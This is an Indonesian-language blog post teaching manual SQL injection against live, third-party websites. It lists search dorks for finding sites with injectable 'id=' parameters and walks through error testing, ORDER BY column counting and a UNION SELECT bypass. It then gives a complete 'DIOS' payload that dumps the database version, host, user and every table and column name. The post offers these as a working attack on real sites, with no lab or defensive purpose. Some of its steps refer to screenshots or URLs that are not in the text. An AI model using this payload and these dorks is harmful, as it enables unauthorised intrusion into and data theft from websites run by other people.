Tutorial SQL Injectoin manual
Welcome to my blog slur
Sudah lama g post ya :v
Sebelumnya trimakasih sudah mau mampir slur :)
Oke kali ini saya akan kasih tutorial sqli + live target
Bahan2
-hp/pc
-kuota pastinya:v
-dork
inurl news.php?id=
inurl php?id=
inurl page.php?id=
Kembangin aja atau g di gogle banyak banget slur
Oke kita langsung ke live target aja
Kita tambah kan koma di belakang nya
Jadi
Nah kalo ada eror seperti di contoh itu artinya vuln ya slur
Kita order by untuk mencari berapa kolom nya
Sampe eror atau
unknown coloum "angkanya" in order clause
Nah kali ini saya mendapat eror di
Jadi coloum di web tersebut ada 12 coloum
Lanjut kita union select
Kwowkwowk kok nggak keluar anggka nyaa mas :v
Sans kita bypas dengan and 0
Nah ada angka ajaib yang keluar ya itu 3 2 5
Nah kalo udah keluar mau di apain sekarang mas? :v
Ya terserah mau di apain
sekarang kita masukin dios aja ya :v
CONCAT(0x3c62723e,0x3c62723e,0x56657273696f6e203a3a20,version(),0x3c62723e,0x4461746162617365203a3a20,database(),0x3c62723e,0x4469726563746f7279203a3a20,@@datadir,0x3c62723e,0x486f73746e616d65203a3a20,@@hostname,0x3c62723e,0x55736572203a3a20,user(),(select(@a)+from+(select(@a:=0x00),(@tbl:=0x00),(select+(@a)+from+(information_schema.columns)+where+(table_schema!=0x696e666f726d6174696f6e5f736368656d61)+and(0x00)in+(@a:=concat(@a,0x3c62723e,if(+(@tbl!=table_name),Concat(0x3c62723e,0x5461626c65203a3a20,@tbl:=table_name,0x3c62723e7e20,column_name),concat(0x7e20,(column_name)))))))a))
Gimana cara masukin nya mas? :v
Ya tinggal taruh di angka yang keluar tadi contoh
Done
Sekian tutor dari saya slur